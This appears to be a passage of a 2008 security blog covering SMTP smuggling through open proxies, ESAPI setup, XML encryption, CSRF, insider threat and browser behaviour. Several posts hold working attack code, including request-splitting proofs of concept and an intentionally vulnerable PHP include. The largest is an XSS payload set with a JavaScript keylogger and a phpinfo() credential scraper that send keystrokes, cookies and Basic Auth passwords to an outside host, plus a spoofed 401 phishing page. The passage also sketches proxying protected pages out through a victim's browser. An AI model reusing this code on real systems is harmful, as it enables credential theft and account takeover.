There are probably a lot more points that I don't address above. If you have any advice for people who have a great idea for an app and are looking to take advantage of outsourced development, feel free to post in the comments.

Thursday, March 27, 2008

Smuggling SMTP through open HTTP proxies

We know that Intranet port scanning through open proxies in web apps can lead to information disclosure (leaking which servers are listening on which ports) and even unauthorized access to HTTP applications that are not exposed to the outside world. What I've been trying to figure out over the past couple of days is how much damage you can do to non-HTTP applications, like SMTP/POP/FTP/etc. I've come to a few interesting conclusions.

To put it simply, what we are able to do in this situation is open a TCP socket between the web server and the target server, and send the target server an HTTP request. Depending on how the target handles the request, it could keep the socket open or close it immediately. In the case of a connection left open, your web browser/client will hang while the web server also hangs waiting for a proper HTTP response from the target. Eventually, the web server or the target will close the connection and the web server will send a response back to you. If the target closes the connection immediately, you will get an immediate response from the web server.

My goal is to get the target service to actually consume and interpret parts of the HTTP request sent by the web server. In my testing, I focused on SMTP, and I did this for two reasons. First, I already had an SMTP server running. Second, this would be a great way for spammers to hijack open SMTP servers that aren't directly exposed to the internet.

I started testing on Windows Server 2003. After sending an HTTP request and looking at the SMTP server logs, it was obvious what was happening. The SMTP server treated each line ending with \r\n as a command, and it generated appropriate errors (500). See the example log below:

#Software: Microsoft Internet Information Services 6.0

#Version: 1.0

#Date: 2008-03-26 19:18:06

#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 get - +/+HTTP/1.0 500 0 32 24 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 accept: - +*/* 500 0 32 11 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 referer: - +https://spoofedreferrer 500 0 32 84 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 ua-cpu: - +x86 500 0 32 11 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 user-agent: - +Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727) 500 0 32 106 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 host: - +192.168.1.2:25 500 0 32 24 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 connection: - +Keep-Alive 500 0 32 22 0 SMTP - - - -


When I sent this request, the connection stayed open and my browser hung until I restarted the SMTP service. As you can see from the log, the SMTP server looked at each line of the HTTP request as a command. If you can control the HTTP headers of your request, you can send commands to the SMTP server. Control of the request headers can come in a number of ways.
1. Request splitting. Example: http://www.webserver.com/vulnProxy?url=http://smtp-server/ HTTP/1.1%0D%0AHELO smtp-server%0D%0AQUIT%0D%0A
2. Some proxies may take all the headers your client sends and include them in the proxied request.

Proof of Concept

SMTP SERVER LOG:
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2008-03-27 00:21:49
#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)

2008-03-27 00:21:49 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 get - +/MAIL%0D%0A+HTTP/1.0 500 0 32 24 0 SMTP - - - -

2008-03-27 00:21:49 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 accept: - +*/* 500 0 32 11 0 SMTP - - - -

2008-03-27 00:21:49 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 QUIT - - 240 0 62 22 0 SMTP - - - -


ASP SCRIPT ON THE WEB SERVER:
<%
' PoC: use XMLHTTP from ASP to smuggle SMTP commands to port 25.
dim http

' Other HTTP client objects tested with similar results:
'set http = createobject("Msxml2.XMLHTTP.4.0")
'set http = createobject("Msxml2.ServerXMLHTTP.4.0")
set http = createobject("Msxml2.XMLHTTP")
'set http = createobject("Microsoft.xmlhttp")
'Set http = CreateObject("WinHttp.WinHttpRequest.5.1")

' The encoded CRLF (%0D%0A) in the path tries to split the request line.
http.open "GET", "http://192.168.1.2:25/MAIL%0D%0A", false
' The header NAME itself is consumed by SMTP as a command line (QUIT).
http.setrequestheader "QUIT xx","serveruplink1" '& vbcrlf & "EHLO"
http.send
response.write http.ResponseText
%>



HTTP RESPONSE FROM ASP SCRIPT:
HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 00:21:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 241
Content-Type: text/html
Cache-control: private


220 ServerUplink1 Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Wed, 26 Mar 2008 19:21:49 -0500
500 5.3.3 Unrecognized command
500 5.3.3 Unrecognized command
221 2.0.0 ServerUplink1 Service closing transmission channel



In the above example, I was able to get the SMTP server to execute the QUIT command, which of course is pretty benign. I haven't gotten any productive commands to execute because I haven't been able to gain complete control over the HTTP request. Apparently, WinHTTP guards against request splitting pretty well :-)

I thought I might have better luck with PHP, so I hooked up the extremely vulnerable PHP script you see below to test with:
<?php
// Intentionally vulnerable: prints a banner, then includes whatever
// local or remote resource the 'mike' querystring parameter names.
print "Hello world!";
include $_GET['mike'];
?>


The PHP include function can be used to execute PHP inline from local or remote resources. So calling vulnProxy.php?mike=http://127.0.0.1:25 will generate the HTTP request below:
GET / HTTP/1.1
Host: 127.0.0.1


Since we are sending the request to port 25, the request will be interpreted by sendmail SMTP. Below are some log entries. I like how sendmail has a clue about open proxies :-)

[root@mikezusman log]# tail -f maillog
Mar 26 18:20:47 mikezusman sendmail[22438]: m2QFKldb022438: mikezusman.com [127.0.0.1]: probable open proxy: command=GET /_M HTTP/1.0\r\n

Mar 26 18:20:47 mikezusman sendmail[22438]: m2QFKldb022438: mikezusman.com [127.0.0.1] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA

Mar 26 19:19:14 mikezusman sendmail[15375]: m2QEu8aC015375: timeout waiting for input from mikezusman.com during server cmd read

Mar 26 19:19:14 mikezusman sendmail[15375]: m2QEu8aC015375: mikezusman.com [127.0.0.1] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA

Mar 27 00:33:04 mikezusman sendmail[5631]: m2QLX3QR005631: mikezusman.com [127.0.0.1]: probable open proxy: command=GET /_M HTTP/1.0\r\n

Mar 27 00:33:04 mikezusman sendmail[5631]: m2QLX3QR005631: mikezusman.com [127.0.0.1] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA

Mar 27 03:33:10 mikezusman sendmail[28294]: m2R0X9Mo028294: mikezusman.com [127.0.0.1]: probable open proxy: command=GET / HTTP/1.0\r\n


I had the same trouble with PHP that I did with ASP. I also tested the above scenarios using the Java HttpURLConnection object, and the results were the same. I couldn't get complete control over the request because of built-in input validation. That's not to say it's impossible - I just haven't figured it out yet.

To conclude, in an open proxy situation, the more control the user has over the server-generated HTTP request, the more the user will be able to connect to services other than HTTP. The only roadblock to complete SMTP hijacking was the request splitting mitigation built in to the various connection methods I tested. Perhaps there is a way around them that I'm not aware of. If so, I'd love to know about it ( %0D%0A, \r\n didn't work :-). I also wonder if there are any developers out there who do not use these standard methods of generating HTTP requests. I'm sure it would be pretty difficult to roll your own and protect yourself against these splitting attacks.
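
For the curious, here is a minimal sketch in Python of what a roll-your-own HTTP client with no splitting protection looks like (host, port, and header names illustrative): CR/LF in the path or header values goes straight to the wire, which is exactly what WinHTTP and friends refuse to allow.

# Minimal sketch of a hand-rolled HTTP client with NO request-splitting
# protection: CR/LF in the path or headers goes straight to the wire.
import socket

def naive_get(host, port, path, headers):
    req = "GET %s HTTP/1.0\r\nHost: %s\r\n" % (path, host)
    for name, value in headers.items():
        req += "%s: %s\r\n" % (name, value)    # no CR/LF validation!
    req += "\r\n"
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(req.encode("latin-1"))
        return sock.recv(4096)

# An injected header value smuggles two SMTP commands to port 25:
resp = naive_get("192.168.1.2", 25, "/", {"X-Junk": "x\r\nHELO evil\r\nQUIT"})
print(resp.decode("latin-1"))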

Monday, March 24, 2008

OWASP ESAPI

I've been playing around with the OWASP ESAPI since I volunteered to write some content for the OWASP Java project.

While I always knew that ESAPI was a great concept, now that I've actually used it, I see how robust it is and how much hard work went into it by Jeff Williams and his colleagues.

I like to keep things simple for myself and avoid the use of things like resource-intensive IDEs (Eclipse) :-) I just like to write my simple test scripts/programs/servlets in TextPad and run/compile things from the command line. That said, getting ESAPI working took a bit of trial and error.

Once I figured out that I needed to set a system property in my JRE which points to the location of ESAPI.properties, I was pretty much rocking and rolling. I progressed pretty easily, and as I ran into more roadblocks, I realized these were just more objects that needed to be in the same folder as the properties file - such as users.txt (an ad hoc user repository). I guess if I used Eclipse properly, this wouldn't be such a hassle.

But I take pride in the fact that I don't rely on any IDE to get my code to compile.

While I plan on working with ESAPI and writing about it more in the future, here is a basic list of what you need to configure to get ESAPI cooking without any IDE nonsense:

1. Download JAR: http://owasp-esapi-java.googlecode.com/files/owasp-esapi-java-1.1.1.jar

2. Install Tomcat & JDK (www.coreservlets.com has a great tutorial if you're new to this)
3. Configure environment:

CATALINA_HOME=c:\bin\tc6\apache-tomcat-6.0.16
JAVA_HOME=c:\program files\java\jdk1.6.0_05
Path=C:\program files\java\jdk1.6.0_05\bin
CLASSPATH=c:\dev\test;c:\program files\java\jdk1.6.0_05\lib;%CATALINA_HOME%\lib\servlet-api.jar;%CATALINA_HOME%\lib\jsp-api.jar;c:\bin\esapi\owasp-esapi-java-1.1.1.jar

4. Edit catalina.bat to include appropriate start up options in JAVA environment:
set JAVA_OPTS=-Dorg.owasp.esapi.resources="/bin/ESAPI"

5. Place the ESAPI.properties file and users.txt in /bin/ESAPI (or wherever you specify the path to be)

6. Configure some simple servlets that invoke the API (see OWASP ESAPI for some code samples).

Thursday, March 13, 2008

Like Mikey, Internet Explorer will consume anything

Nothing new or too exciting in this post, but I just felt like documenting some IE behavior I've observed.

You might not realize it, but when you visit a web site, you are allowing that site to place all sorts of content on your computer inside your temporary internet cache.
What happens with that content - such as rendering images, launching executables & third party apps, etc - occurs based on decisions your browser makes.

These decisions are based on the content-type of the data sent by the web server, browser security restrictions, and user configurable options such as security zones.
For example, if the content-type of data sent is "image/jpeg", your browser will cache the data and attempt to render it as an image. If the content-type is "application/ms-word", IE will first prompt the user to continue or not. With an affirmative response, IE will cache the file and pass it to Word as a command argument to be opened.

I was curious if I could trick the browser into downloading malicious code without the normal security warnings. The bad news is that this is pretty easy to do. The good news is that it's pretty hard to launch the code! For example, I can configure my web server to respond to a request with a .EXE file and a text/html or image/jpeg content-type. This will cause the browser to download the .EXE, cache it, and attempt to render it in whatever context the HTML specifies.
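
A minimal sketch of the server-side half of that test, using Python's built-in http.server (file name and port illustrative): the body is an .EXE, but the Content-Type claims it's an image.

# Minimal sketch: serve an .EXE body with a lying Content-Type so the
# browser caches it without the usual executable-download prompt.
from http.server import BaseHTTPRequestHandler, HTTPServer

class LyingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        with open("payload.exe", "rb") as f:    # illustrative file name
            body = f.read()
        self.send_response(200)
        self.send_header("Content-Type", "image/jpeg")  # not a JPEG
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

HTTPServer(("0.0.0.0", 8080), LyingHandler).serve_forever()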

To check the integrity of the downloaded .EXE, I attempted to launch it by double-clicking it in the Temporary Internet Files folder within Explorer. Explorer launched IE, which tried to render it based on the originally specified content-type. No luck there. Then I just manually copied it out of the temporary folder into c:\. It allowed me to do this, but put a .html extension on the file instead of the original .EXE. So I renamed the copy to .EXE, double-clicked it, and it launched.

While this is not horrible on its own, it could help an attacker who already has some access to a target computer and needs a way to get further malware onto the machine. This behavior could allow an attacker to turn a less severe applet or ActiveX vulnerability that permits manipulating client-side files into a remote code execution vuln.

This could also be used for malicious purposes in other contexts. Maybe I don't want to execute code on your machine, but I want to frame you by placing questionable content on your system. All I need you to do is visit a web site I control, and then I tip off management that you're downloading porn.

Wednesday, March 12, 2008

Web Services Security

I spent the last two days in downtown Manhattan attending Web Services Security training by Gunnar Peterson and TechSmart Solutions Group. It was definitely worthwhile. I had been of the REST mindset, where I wondered why all the added complexity of web services, WS-Security, SAML, etc., was necessary. I always asked myself: why can't we just use HTTP GETs to get things done?

Maybe for some one-off situations REST is fine. But for large scale enterprise deployments, where a given web service request/response may travel over multiple hops, through different organizations, the added complexity has some real value. For example, SAML and federated identity services can make authenticating web service requests across organizational boundaries seamless and reliable. And WS-Security standards for message level encryption allow you to protect the data you're transporting while allowing authorized systems to view message routing information within your SOAP request.

One interesting attack Gunnar speaks about in his training is the "Encrypted Element Known Plain Text Attack". In this attack, if an attacker knows your XSD or DTD, and you encrypt entire XML elements instead of just the data within the element, the attacker can much more easily brute-force your encryption.

An example:

XSD:
<xs:element name="Name"...>
<xs:element name="Username"...>
<xs:element name="Password"...>

XML:
<name>Mike</name>
<username>schmoilito</username>
<enc:CipherData><enc:CipherValue>KXN398H3HFH39S3S</enc:CipherValue></enc:CipherData>

In the above situation, the attacker can safely assume that the encrypted value starts with <password> and ends with </password>. I'm no cryptography expert, but I think it is easy to see how this makes the attacker's job easier.

In this example, you are better off encrypting less of the XML document, like this:
<name>Mike</name>
<username>schmoilito</username>
<password>
<enc:CipherData><enc:CipherValue>KXN398H3HFH39S3S</enc:CipherValue></enc:CipherData>
</password>

Now, only the password value is encrypted, and your encrypted data is within the password element. The attacker gets no benefit from knowing your XSD.

XML security can be quite versatile. The above example shows the distinction between encrypting an entire element and encrypting just the data, and how encrypting more than you really need to can actually reduce your overall security. In some situations, you may want to encrypt different elements in your document with different keys, such that different systems can read only the data they need to see within the XML.

In short, all this web service stuff is pretty cool. If you can, definitely enroll in one of Gunnar's classes.

Friday, March 7, 2008

我不得到尊敬 (I get no respect)

Finally, a computer security article on CNN that I enjoyed reading.

However, there is one line in the article that bothers me. That line would be when James Mulvenon referred to Chinese hackers who break into sensitive US installations, without being sanctioned to do so by the Chinese government, as "useful idiots." That's why I ripped off a Rodney Dangerfield line to title this post ;-)

Personally, I understand how easily misconfigured systems and systems running bad code can be compromised. But by saying a bored "idiot" is all it takes to compromise the Pentagon, he is really slamming our own personnel and the systems in place to protect these critical assets. In showing disrespect for our adversaries, we basically show disrespect for ourselves.

Thursday, March 6, 2008

Stealing Basic Auth with Persistent XSS - Part 2

I found a better way to steal basic auth credentials using XSS, and it uses the same principle as cross site tracing. Basically, you need to get the web server to reflect either the authorization header or the user credentials in its HTML output. Once the data is accessible in the HTML, you can access it using JavaScript, and bypass the same origin policy.

The mitigating factor here is that servers don't always conveniently do this for you. Fortunately, many PHP applications, including the one I was testing, will have an arbitrary PHP test page somewhere in the web root. These test pages usually use the phpinfo() function to display server info and confirm to the admin that the machine is functioning.

Among other server config details, the php_info() method also displays the user name and password of the currently logged in user. Here is one example of this script out in the wild. The source is basically:
<?php
php_info();
?>

Drop that source code into a .php file on your server, protect it with basic auth, and then access the script and enter your creds. Scroll down and you will see your credentials in the HTML output.
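
For anyone who wants to reproduce this, the Basic Auth piece on Apache is just a few lines of .htaccess (the paths and realm name here are placeholders):

AuthType Basic
AuthName "Test Realm"
AuthUserFile /path/to/.htpasswd
Require valid-user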

When you have an XSS vulnerability, you can use XMLHTTP to request the php info URL, parse out the data, and send it off to a server you control. Below is some sample JavaScript to do just this.

function splitit(stringy) {
// Grab the first space-delimited token after the split point
var cut = stringy.split(' ');
return cut[0];
}

function fetch(url) {

var xmlhttp = false;

// Older IE exposes XMLHTTP through ActiveX
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp = false;
}
}

// Everything else has a native XMLHttpRequest
if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
xmlhttp = new XMLHttpRequest();
}

// Synchronous request, so we can return the response body directly
xmlhttp.open("GET", url, false);
xmlhttp.send(null);
return xmlhttp.responseText;
}

var resp = fetch('php1.php');
// phpinfo() output contains PHP_AUTH_USER"] and PHP_AUTH_PW"] markers
var SplitUser = resp.split('PHP_AUTH_USER"]');
var SplitPass = resp.split('PHP_AUTH_PW"]');
var username, password;
if (SplitUser.length > 1) {
username = splitit(SplitUser[1]);
}
if (SplitPass.length > 1) {
password = splitit(SplitPass[1]);
}
// Ship the credentials off to a server we control via an image request
document.images[0].src = 'http://yourserver/kl/logger1.asp?key=' + username + '|' + password;

Tuesday, March 4, 2008

Fun with Persistent XSS

For the past few weeks, I've been doing some pen-testing for a friend, after hours. His client is an Internet business with no staging/qa systems, so I was testing production web apps. For one particular app, we did primarily a black box test where I was given only one set of low privileged credentials.

The application contains links to other applications also protected with basic auth, but for which my creds have no access. I needed to get access to these other apps on other servers, since that's where the juicy data was!

After many hours, the only vuln I could find was some persistent cross-site scripting in a user profile management script. I could create profiles of people, which populated a drop-down list in the left-hand frame of the site, and it was in this list that I could inject arbitrary tags. Since the site relied only on the Authorization header to grant access, and not a session cookie, cookie theft and session hijacking were not feasible options.

My payload: <SCRIPT src="http://myserver.com/script/"></script>
I used a default file (index.asp) to serve the JS content since I had some space limitations to deal with.

I looked into cross-site tracing to try to steal Authorization headers, but I couldn't get it to work with JS or client-side VBScript (XMLHTTP/WINHTTP won't let you issue a TRACE). I figured the next best tactic would be to launch some more invasive XSS attacks. After confirming the rules of engagement, I was given the OK to start pwning browsers. Awesome!

My first payload consisted of a JavaScript key logger, as well as some code to track user statistics (IP address, what URLs they're visiting, etc). It's at the bottom of this post. There is a lot I could have done here, but rather than try to compromise clients, I focused on just trying to steal user credentials. All I really wanted was access to other applications linked to from this portal.

Once I deployed the initial payload, I found that at that particular time, there was only one user, and he/she wasn't typing anything in the browser. I wasn't logging any key strokes, but I saw the browser requesting one URL over and over again. The URL was a stats page showing how many customers were converting on one of their web sites :-) (Anyone who has ever run an ecommerce site knows what I'm talking about)

Since I couldn't get the Authorization header, there were no cookies, and my user wasn't even typing anything, I figured my best shot would be to phish the credentials out of him using a spoofed 401 authentication request. I put a script on my web server that prompted the user for credentials while spoofing the realm that the real server used. Using my XSS payload, I could then redirect the main frame of the user's browser to my 401 script whenever I wanted.

Since the page was framed, and did not use HTTPS, it would not be immediately obvious that any of my scripts were hosted elsewhere. The authentication prompt did show my web server IP address, but I hoped the user would not notice this subtle detail. I was relying on the user to enter their credentials into my spoofed basic auth prompt without a second thought.

I waited for the user to come back and start refreshing the stats page. When they did, I modified my JS payload to start redirecting to my spoofed basic auth page. My script logged whatever Authorization header the browser sent back, but it never let the user through. Since I was actively monitoring the attack, I would manually disable it to let the user through and hopefully not arouse too much suspicion.

The first attempt yielded Og==, a base64-encoded colon. Since my script was hosted on a different domain, the browser did not initially pre-populate anything, and the user just hit enter, submitting a blank username and password. The second attempt got me MTkyLjE2OC4xLjIwXGpvaG46, which decodes to "192.168.1.20\john:". The browser populated the username field with the client machine IP and the locally logged-on user name; the user didn't enter a password and hit submit.

At this point, I was pretty frustrated, so I disabled the 401 prompt, let the user in, and went back to the drawing board. My script was working, but the user didn't enter anything. I didn't see a better way to launch this attack, so I just tried a few more times. Eventually, the user entered the same credentials I had initially been given to conduct the test. I phished the credentials I already had! They were probably the easiest for the user to obtain, since they had recently been provided to us for the test. Oh well...

My big mistake here was that I assumed the user knew their account credentials. More likely, they entered them once, but checked the box allowing the browser to remember them, so they never had to manually enter them again.

Looking back, rather than attempt to steal credentials, I could have written some JavaScript to proxy HTTP requests to protected resources through this user's browser and send the resulting response data back to me. This would have taken much more time. I'll have to write some code to do that for next time.
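
Something like this minimal sketch is what I have in mind. The browser attaches the victim's cached Basic Auth credentials to same-origin requests automatically; the protected URL and collector script below are hypothetical:

// Fetch a protected, same-origin resource from inside the victim's
// browser; their cached Basic Auth credentials ride along automatically.
function proxyFetch(protectedUrl) {
var xhr = new XMLHttpRequest();
xhr.open('GET', protectedUrl, false); // synchronous keeps the sketch simple
xhr.send(null);
return xhr.responseText;
}

var body = proxyFetch('/admin/stats.asp'); // hypothetical protected page
// Exfiltrate the response in query-string sized chunks
for (var i = 0; i < body.length; i += 1000) {
new Image().src = 'http://myserver.com/kl/collector.asp?d=' +
encodeURIComponent(body.substring(i, i + 1000));
}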

Even though I was not completely successful, this was still a fun exercise. It was cool to actually go head to head against one person in real time, and modify my attack on the fly! I don't usually get to do that at my day job...

If anyone has any other ideas on what I could have done differently, feel free to comment. That is, if anyone actually reads this long post. If you still feel like reading, check my code below. Cheers!


JavaScript - not the prettiest, but it got the job done!
<% response.contenttype="text/javascript" %>

function keylogger(e){
// Exfiltrate the keystroke plus the cookie via an image request
document.images[0].src = "http://xxxxxxx/k/logger.asp?key=" + e.keyCode + "&ccookie=" + document.cookie;
}
// Mark the start of a logging session
document.images[0].src = "http://xxxxxxxx/k/logger.asp?key=0&ccookie=BEGIN" + document.cookie;

var browser=navigator.appName;
var b_version=navigator.appVersion;
var version=parseFloat(b_version);
if ((browser=="Microsoft Internet Explorer")&& (version>=4)){
// IE: hook keypress on this frame and the main frame via window.event
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
//window.status = keylog += String.fromCharCode(k) + '[' + k +']';
document.images[0].src = "http://xxxxxxxxxx/k/logger.asp?key=" + k + "&ccookie=" + document.cookie;
}
parent.frames[1].document.onkeypress = function () {
k = parent.frames[1].window.event.keyCode;
//window.status = keylog += String.fromCharCode(k) + '[' + k +']';
document.images[0].src = "http://xxxxxxxxx/k/logger.asp?key=" + k + "&ccookie=" + document.cookie;
}
}
else
{
// Everyone else: standard DOM listeners on both frames
document.body.addEventListener("keyup", keylogger, false);
parent.frames[1].document.body.addEventListener("keyup", keylogger, false);
}
// parent.frames[1].document.location = "http://xxxxxxxxxxx/k/auth.asp";
// Mark the end of the run and record which URL the main frame is on
document.images[0].src = "http://xxxxxxxx/k/logger.asp?key=0&ccookie=END" + document.cookie + "%20" + parent.frames[1].document.location.href;



Logger.asp:
<%
' Log the keystroke, the referring page, and the cookie value
strKey = request("key")
httpReferrer = request.servervariables("HTTP_REFERER")
httpCookie = request("ccookie")
x = Logit("d:\logs\keylogger.txt", chr(strKey) & vbtab & httpReferrer & vbtab & httpCookie)

' Append a timestamped line to the log file (8 = ForAppending)
function Logit(strOutputFile, strOutPut)
Dim objFSO, objOutputFile
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objOutputFile = objFSO.OpenTextFile(strOutputFile, 8, True)
objOutputFile.Write now() & vbtab & strOutPut & vbCrLf
objOutputFile.Close
Set objFSO = Nothing
Set objOutputFile = Nothing
end function %>



Auth.asp - Modified to send the user where they want to go after they submit creds.
<%
function Logit(strOutputFile, strOutPut)
Dim objFSO, objOutputFile
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objOutputFile = objFSO.OpenTextFile(strOutputFile, 8, True)
objOutputFile.Write now() & vbtab & strOutPut & vbCrLf
objOutputFile.Close
Set objFSO = Nothing
Set objOutputFile = Nothing
end function

if instr(request.servervariables("ALL_RAW"), "Authorization:") <= 0 then
' No Authorization header yet: log the raw headers and demand Basic auth
' with a spoofed realm and Server header
x = Logit("d:\logs\credlogger.txt", request.servervariables("ALL_RAW"))
response.status = 401
response.addheader "WWW-Authenticate", "Basic realm=""Spoofin yo realmz!"""
response.addheader "Server", "Apache/1.3.20 (Unix) PHP/4.2.2"
else
' Credentials received: log them and send the user on their way
x = Logit("d:\logs\credlogger.txt", request.servervariables("ALL_RAW"))
%>
<script>
document.location.href="http://where the user wants to go";
</script>
<% end if %>

Thursday, February 28, 2008

XMLHTTP, res://, and name look-ups

After reading another one of RSnake's posts about file enumeration using res://, I went back to see how XMLHTTP handles this protocol. It can make for some interesting results if the URI can be controlled by the user.

------------------------------------------------------------

set http = createobject("Msxml2.XMLHTTP")
http.open "GET", "res://cmd.exe"

msxml3.dll error '80070005'
Access is denied.
------------------------------------------------------------
http.open "GET", "res://notepad.exe"

msxml3.dll error '80070715'
The specified resource type cannot be found in the image file.
------------------------------------------------------------
http.open "GET", "res://garbage.exe"

msxml3.dll error '80070002'
The system cannot find the file specified.

------------------------------------------------------------
http.open "GET", "res://shdoclc.dll/IESecHelp.htm"

"Internet Explorer Enhanced Security Configuration places your server and Microsoft Internet Explorer ...."


When a server makes a remote or local request for a user-specified resource, there is a lot more going on server-side than you might initially realize. Filemon is a good tool for seeing what's going on when the server tries to access local files. And of course, Wireshark is fun for seeing what happens when you request remote files.

For example, on a Windows box, specifying http://shortname will cause the server to send out NetBIOS Name Service (NBNS) UDP broadcasts on its subnet, while requesting http://fqdn.com will make the server issue DNS requests (assuming the host is not in the DNS cache). Clearly, you can get the server to reach out to more machines than just the one hosting the content you're trying to fetch, which means we have more attack vectors to worry about.

Wednesday, February 27, 2008

Insider-threat Evolution

Yesterday at work, we were doing some group threat modeling exercises based on HacMeBank. One of the threats we modeled was that of the theoretical admin portion of the site, for which all admins shared one set of credentials and had free rein over customer data and accounts.

While everyone agreed this was bad, everyone except me said the threat was less severe because employees should be vetted and trusted. Prospective employees go through background checks and other processes before being hired to ensure that they are of the highest moral fiber and good character.

While an employee could be a low threat when they first join the company, two years later, when the adjustable rate on Joe's mortgage kicks in, his wife gets pregnant, and he loses his promotion to Bob, Joe may be moved to take some drastic steps to ensure the well-being of his family, such as selling the company's consumer data on IRC.

While it is important to thoroughly check out prospective employees during the hiring process, just because you hire them shouldn't mean they get the keys to the kingdom. In many cases, the keys consist literally of encryption keys, as well as application layer functionality.

I tell developers to never trust a user, and a user can be an anonymous web surfer, a paying customer, or an employee. In the same way, the business needs to have a healthy distrust of employees - from the CEO on down to the guys in the mail room, and especially your outsourced third-party developers.

I'm not advocating invading employee privacy with cloak-and-dagger tactics. I just want businesses to realize the need to invest in security for internal applications, and to take the threat just as seriously as most are beginning to take the outside threat. In the same way technology changes and external threats evolve, people change, and internal threats can emerge from entities that were once vetted and trusted.

For more on insider threats, there is a write-up currently on Security Focus about employees abusing privileges at a Wisconsin power company (with links to related stories). And let's not forget Jerome Kerviel, who abused internal systems and policies to rack up an astronomical financial loss for Societe Generale.

Monday, February 25, 2008

Leave Cookies to the Keebler Elves

If you don't know what CSRF is, you can read about it here.

I was talking to some developers today about using tokens and requiring passwords on forms to prevent CSRF. Then my friend Matt asked why can't we just stop using cookies?

If an application doesn't rely on the browser automatically sending cookies for session management, CSRF becomes a non-issue. Of course, this means the developers have to handle session management with additional code (those poor souls!). Instead of the browser automatically sending cookies with each request, the developers need to make sure any link or form action has the session ID in it, as in the sketch below. We looked at Tomcat, and to some extent it has the ability to automatically append session identifiers to some URLs (I need to research this more).
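
As a rough sketch of that client-side plumbing (the sid parameter name is made up, and a real implementation would more likely live server-side in the templating layer), every link and form on the page gets the session ID attached before use:

// Propagate the session ID without cookies: rewrite every link's query
// string and add a hidden field to every form on the page
function appendSessionId(sid) {
var i, sep;
for (i = 0; i < document.links.length; i++) {
sep = document.links[i].href.indexOf('?') === -1 ? '?' : '&';
document.links[i].href += sep + 'sid=' + encodeURIComponent(sid);
}
for (i = 0; i < document.forms.length; i++) {
var input = document.createElement('input');
input.type = 'hidden';
input.name = 'sid';
input.value = sid;
document.forms[i].appendChild(input);
}
}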

Having the session ID in the query string does introduce other risks, such as making it visible in logs on the web server and any intermediate proxy. Right now, I think the benefit of zero CSRF outweighs those risks.

HTTP wasn't designed to maintain state. Cookies were an afterthought, added once people realized they needed a way to group multiple requests together into a logical "session".

Unfortunately, Web 2.0 gives us much more code executing on the client, all of which relies on the web browser sending cookies with each outgoing request (assuming the receiving code on the app server actually verifies the requests are part of a valid session). That said, I don't think we'll see any mass exodus from cookies any time soon.

Updated 2:26PM EST 2/25/2008
I totally forgot about session hijacking attacks, which are a good reason not to rely on session identifiers being sent in URL query strings. This is where attackers forge links with session IDs in them and trick users into clicking on them and logging in. These attacks could lead to badness worse than that of CSRF.

Updated 9:24PM EST 2/25/2008
Doh! I should have read my last post. Session IDs in the URL are also vulnerable to referer leakage!

(That's what happens when I get too eager to press "publish" and head out to lunch!)

Thursday, February 21, 2008

Leaky Web Browsers

I'm pretty compulsive when it comes to checking out my blog stats in Google analytics, specifically, the referer data. For a while, I'd been mulling over some corporate intranet hosts that were sending clicks through. I Google'd them, but couldn't find out what company they were coming from.

Today I found out.

I was on a conf call with a security vendor who was giving his pitch and demo'ing his software. One part of the tool showed some sample data. Data which contained some internal host names from his corporate intranet. Host names which were on the same domain as the mystery referer in my stats!

Out of respect, I won't shout them out on here. But I do think it goes to show how easy it is to inadvertently leak corporate data. Referer data leaks have been talked about for a while now. I wonder when browsers will allow users to prevent referers from being sent across security zones.

Thanks for the links everyone :-)

Tuesday, February 19, 2008

ActiveX and Applet Security

"Designing for security is important because an ActiveX control is particularly vulnerable to attack. An application running on any Web site can use the control; all that it needs is the control's class identifier (CLSID)."
http://msdn2.microsoft.com/en-us/library/aa752035(VS.85).aspx

The threat of malicious web sites abusing ActiveX objects already installed on client PCs is real, as confirmed by the above MSDN article, and numerous published vulnerabilities. In some instances, cached Java applets can be abused in the same way. Depending on what the code does, this problem can lead to some really nasty vulnerabilities in application logic.
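
To illustrate the point from the MSDN quote, any page a user visits can simply try to instantiate an installed control and poke at its methods. The CLSID and method name below are made-up placeholders, not a real vulnerable control:

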